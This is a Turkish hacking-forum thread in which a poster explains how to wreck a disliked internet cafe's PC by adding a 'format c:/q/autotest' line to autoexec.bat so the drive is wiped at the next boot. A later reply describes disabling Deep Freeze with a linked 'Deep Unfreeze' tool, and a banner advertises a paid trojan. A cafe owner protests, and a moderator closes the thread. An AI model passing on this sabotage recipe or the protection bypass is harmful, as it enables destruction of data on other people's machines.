internet cafe hack !!!!!sevmediğiniz bir internet cafeyiii çok kolay bi yolla gümletin. herhangi bi masaya oturun biraz takılın kalkmadan az bi zmn öncee c: nin içinde bulunan autoexec.bat dosyasını not defteriyle aç içine
Konu enver57 tarafından açılmış, 2908 kişi tarafından görüntülenip, 8 yanıt almış.
|
Özel Yazılım Trojan+, güncellemeli ve garantili. Sadece 690TL! Kredi kartınıza 12 taksit kolaylığı!
|
|||||||
|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|
|
#1 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Sep 2005
Üye numarası: #36634
Karma etkisi: 177
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 17088
|
sevmediğiniz bir internet cafeyiii çok kolay bi yolla gümletin.
herhangi bi masaya oturun biraz takılın kalkmadan az bi zmn öncee c: nin içinde bulunan autoexec.bat dosyasını not defteriyle aç içine \"format c:/q/autotest\" yazz ve kaydeet(önemli).işte bu kdrrrr. sora bilgisayar kapanıp açıldığındaaaa formattt kolay gelsinnnnnnnn |
|
|
|
|
#2 |
|
Cool Üye
![]() ![]() ![]() Kayıt Tarihi: Sep 2005
Üye numarası: #36634
Karma etkisi: 177
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 17088
|
yazmayı unuttum arkadaşlar konu alıntıdır bilginize. test etmedim
|
|
|
|
|
#3 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Mar 2006
Üye numarası: #56200 Yer: sessiz,karanlık sokaklar...
Karma etkisi: 1178
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 116791
|
98 de çok yaptım bunu ama xp de hiç denemedim.başlangıca format c: yazmış oluyorsun bu pc açılırken format atmaya başlıyor muhtemelen xp de aynıdır.
|
|
|
|
|
#4 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Oct 2005
Üye numarası: #37617 Yer: Memorialise
Karma etkisi: 31110
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 3108667
|
biLgisayarLarda deep freeze varsa ne oLacak peki (
) ? |
|
|
|
|
#5 |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Oct 2005
Üye numarası: #37164 Yer: altı
Karma etkisi: 17393
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 1738227
|
|
|
|
|
|
#6 |
|
Daimi Üye
![]() ![]() ![]() Kayıt Tarihi: Feb 2008
Üye numarası: #195654 Yer: İzmir/Ksk 35 ½
Karma etkisi: 201
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 19624
|
Eğer işe yarıyorsa güzel yöntem. Ama neredeyse Deep Freeze kullanmayan internet cafe yok. Bu yöntemi uygulayabişmeniz için ilk önce Deep freeze' yi devre dışı bırakmanız gerekiyor. Devre dışı bırakmak istediğiniz deep freeze 4-5 sürümleri ise aşağıda linkini vermiş olduğum dep unfreeze' yi kullanabilirsiniz. Eğer deep freeze 6 ve üstü sürümleri ise deep unfreeze işe yaramaz. Ama kafeler 4 ve 5 sürümlerini kullanıyor.
Deep Unfreeze Download: http://rapidshare.com/files/11408522...305_r.exe.html Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=207955 ::::::::::::::::::::Saygılar::::::::::::::::::: |
|
|
|
|
#7 |
|
Banned
![]() Kayıt Tarihi: Oct 2007
Üye numarası: #154542
Karma etkisi: 0
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: -11758
|
ulan insan olun bende internet kafeciyim neden böle kötülük yapıyorsunuz ..
internet kafecilerden ne gibi bi kötülük gördünüz olum admın kafasının attırmayın insan olun harbi sinrlendim .... |
|
|
|
|
#8 | |
|
Forum Ustası
![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Jan 2008
Üye numarası: #183208 Yer: İstanbul
Karma etkisi: 38920
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 3890879
|
Alıntı:
Hocam sakın ol bende internet cafe işletiyorum deep freeze 6 kur sende ![]() |
|
|
|
|
|
#9 |
|
Moderator
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Kayıt Tarihi: Jun 2005
Üye numarası: #25757 Yer: C:\perl\bin>
Karma etkisi: 22547
![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() ![]() Karma: 2253264
|
http://www.wardom.org/format-attirma...0.html?t=84030
yukarıdaki konu buradaki olayın basic ile yazılmış halidir...hangi işletim sistemlerinde işe yaradığını gözden geçiriniz... konunun hacking ile alakasını anlayamadım,yüzlerce pc'ye format attım hepsini hacklemiş mi oldum? konu kapandı... saygılar edit: bu konunun bir benzeri de mail yolu ile karşı tarafa format atın şeklindeydi,isteyen araştırabilir ![]() Kaynak: Wardom http://www.wardom.com.tr/showthread.php?t=207955 saygılar Düzenleyen ReQuiemForAsaW : 11-05-2008 at 12:11. |
|
|
![]() |
| Şu Anda Konuyu Görüntüleyenler: 1 (0 üye ve 1 misafir) | |
| Konu Araçları | Bu Konuda Ara |
|
|